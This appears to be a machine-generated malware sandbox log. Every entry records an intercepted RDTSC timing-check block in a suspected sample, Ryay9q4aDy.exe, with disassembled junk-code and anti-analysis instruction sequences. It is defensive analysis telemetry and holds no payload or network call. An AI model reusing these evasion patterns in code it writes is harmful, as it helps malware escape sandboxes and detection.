Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 384DE0 second address: 384DE6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 384DE6 second address: 384E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F8EA4E2EA4Ch 0x0000000c pop edx 0x0000000d pushad 0x0000000e jl 00007F8EA4E2EA4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38524C second address: 385250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 385250 second address: 385261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 385261 second address: 385269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 385269 second address: 38526D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38526D second address: 385277 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8EA52B3CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 388CC8 second address: 388CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F8EA4E2EA46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38A29C second address: 38A2AA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8EA52B3CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38A2AA second address: 38A2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 30509E second address: 3050A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3050A4 second address: 3050A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3050A8 second address: 3050B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3050B4 second address: 3050B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3050B8 second address: 3050BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348293 second address: 3482FC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jno 00007F8EA4E2EA49h 0x00000013 lea eax, dword ptr [ebp+1247CFFCh] 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F8EA4E2EA48h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 call 00007F8EA4E2EA59h 0x00000038 mov ecx, 5915DE91h 0x0000003d pop ecx 0x0000003e nop 0x0000003f pushad 0x00000040 pushad 0x00000041 jbe 00007F8EA4E2EA46h 0x00000047 push esi 0x00000048 pop esi 0x00000049 popad 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3482FC second address: 34830D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F8EA52B3CA8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34830D second address: 33239E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dx, 43E9h 0x0000000e mov ch, 0Bh 0x00000010 call dword ptr [ebp+122D2DAFh] 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F8EA4E2EA4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34882E second address: 348851 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8EA52B3CB8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348851 second address: 348857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348857 second address: 34885B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34885B second address: 348891 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jp 00007F8EA4E2EA5Fh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348A20 second address: 348A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348A26 second address: 348A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348A2A second address: 348A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push ecx 0x0000000d sub ecx, 3046FBC3h 0x00000013 pop edx 0x00000014 add cx, 30FCh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jmp 00007F8EA52B3CABh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348C1E second address: 348C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F8EA4E2EA4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348D78 second address: 348D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348D7D second address: 348D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348D83 second address: 348DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F8EA52B3CB3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348DA1 second address: 348DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3491C4 second address: 3491EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F8EA52B3CA6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, dword ptr [ebp+122D3C51h] 0x00000015 push 0000001Eh 0x00000017 mov ecx, dword ptr [ebp+122D3A5Dh] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jc 00007F8EA52B3CA6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3491EC second address: 3491F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 349589 second address: 34958D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34958D second address: 3495A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F8EA4E2EA4Fh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3495A7 second address: 3495D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 xor ecx, dword ptr [ebp+122D3D69h] 0x0000000f lea eax, dword ptr [ebp+1247D040h] 0x00000015 mov dx, 8C1Bh 0x00000019 nop 0x0000001a push esi 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 pop esi 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push esi 0x00000027 pop esi 0x00000028 push edi 0x00000029 pop edi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3495D2 second address: 34966D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F8EA4E2EA46h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8EA4E2EA48h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jp 00007F8EA4E2EA58h 0x0000002d lea eax, dword ptr [ebp+1247CFFCh] 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F8EA4E2EA48h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D3995h], eax 0x00000053 jp 00007F8EA4E2EA48h 0x00000059 nop 0x0000005a pushad 0x0000005b jno 00007F8EA4E2EA4Ch 0x00000061 push edi 0x00000062 pushad 0x00000063 popad 0x00000064 pop edi 0x00000065 popad 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a jl 00007F8EA4E2EA46h 0x00000070 js 00007F8EA4E2EA46h 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38D9B6 second address: 38D9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F8EA52B3CA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38D9CA second address: 38D9CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38D9CE second address: 38D9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38E145 second address: 38E149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38E149 second address: 38E151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 391625 second address: 39162A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3945BA second address: 3945CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8EA52B3CA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F8EA52B3CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3941B1 second address: 3941D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jc 00007F8EA4E2EA48h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 popad 0x00000016 push edi 0x00000017 jmp 00007F8EA4E2EA4Dh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 396967 second address: 39696C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39696C second address: 396988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4E2EA4Fh 0x00000009 pop ebx 0x0000000a je 00007F8EA4E2EA4Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39658C second address: 3965BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007F8EA52B3CA6h 0x00000012 jmp 00007F8EA52B3CB2h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3966F8 second address: 396702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 398037 second address: 39803D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39FF42 second address: 39FF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39ED48 second address: 39ED7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F8EA52B3CB4h 0x00000012 popad 0x00000013 jmp 00007F8EA52B3CB0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39EEDF second address: 39EEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348F7F second address: 348FD4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F8EA52B3CA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F8EA52B3CA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D5984h], eax 0x0000002f mov ebx, dword ptr [ebp+1247D03Bh] 0x00000035 adc ecx, 020C1EBEh 0x0000003b add eax, ebx 0x0000003d mov dword ptr [ebp+122D18ACh], eax 0x00000043 push eax 0x00000044 pushad 0x00000045 jc 00007F8EA52B3CACh 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 348FD4 second address: 34904C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F8EA4E2EA4Dh 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F8EA4E2EA48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F8EA4E2EA48h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 jnp 00007F8EA4E2EA4Ch 0x0000004d mov dword ptr [ebp+122D1BF6h], ebx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jng 00007F8EA4E2EA48h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39F02F second address: 39F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8EA52B3CB3h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39F051 second address: 39F055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39F1B9 second address: 39F1C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 39F1C1 second address: 39F1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA55h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A4BDA second address: 3A4BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F8EA52B3CA6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8EA52B3CB5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A4BFB second address: 3A4C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA56h 0x00000007 jne 00007F8EA4E2EA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 jnc 00007F8EA4E2EA46h 0x00000019 jmp 00007F8EA4E2EA4Ah 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F8EA4E2EA50h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A3E10 second address: 3A3E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A3E17 second address: 3A3E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A3E1D second address: 3A3E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA52B3CABh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A4139 second address: 3A413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A442B second address: 3A4430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A4430 second address: 3A4460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8EA4E2EA50h 0x0000000a jc 00007F8EA4E2EA46h 0x00000010 popad 0x00000011 jmp 00007F8EA4E2EA4Bh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A7B6D second address: 3A7B7D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8EA52B3CA6h 0x00000008 jns 00007F8EA52B3CA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A75D7 second address: 3A75EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8EA4E2EA46h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F8EA4E2EA46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A75EA second address: 3A75EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3A75EE second address: 3A761D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F8EA4E2EA4Eh 0x0000000e pop ebx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8EA4E2EA54h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AFDF2 second address: 3AFE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F8EA52B3CAEh 0x0000000d ja 00007F8EA52B3CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 jno 00007F8EA52B3CA8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3ADFF1 second address: 3ADFF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AE983 second address: 3AE990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8EA52B3CA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AE990 second address: 3AE994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF247 second address: 3AF252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8EA52B3CA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF52A second address: 3AF536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F8EA4E2EA46h 0x0000000c rdtsc
